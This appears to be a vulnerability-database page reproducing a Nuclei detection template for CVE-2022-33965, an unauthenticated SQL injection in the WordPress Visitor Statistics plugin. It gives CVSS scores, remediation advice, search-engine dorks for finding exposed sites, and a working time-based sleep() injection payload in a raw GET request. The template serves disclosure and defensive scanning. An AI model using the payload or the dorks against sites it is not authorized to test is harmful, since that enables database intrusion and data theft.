Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-33965
HistoryOct 10, 2022 - 6:07 a.m.

WordPress Visitor Statistics <=5.7 - SQL Injection

2022-10-1006:07:38
ProjectDiscovery
github.com
23
cve2022
wordpress
wp-plugin
sql-injection
unauthenticated
wp-stats-manager
plugins-market

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.015 Low

EPSS

Percentile

86.8%

WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2022-33965

info:
  name: WordPress Visitor Statistics <=5.7 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
  remediation: |
    Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability.
  reference:
    - https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities
    - https://wordpress.org/plugins/wp-stats-manager/
    - https://wordpress.org/plugins/wp-stats-manager/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2022-33965
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-33965
    cwe-id: CWE-89
    epss-score: 0.01516
    epss-percentile: 0.86982
    cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: plugins-market
    product: wp_visitor_statistics
    framework: wordpress
    shodan-query: http.html:"wp-stats-manager"
    fofa-query: body="wp-stats-manager"
    google-query: inurl:"/wp-content/plugins/wp-stats-manager"
  tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market

http:
  - raw:
      - |
        @timeout: 15s
        GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'

      - type: regex
        regex:
          - "^1331' and sleep\\(7\\) or '$"

      - type: status
        status:
          - 200
# digest: 490a00463044022010498ead32ed9ea2f6ed4ad02c4c9979675c0d3013345386dd47c45311f02978022055871fb9107c042ae2c3b99ba818130e6177204137e06b01a1a1184742479f4a:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.015 Low

EPSS

Percentile

86.8%

Related for NUCLEI:CVE-2022-33965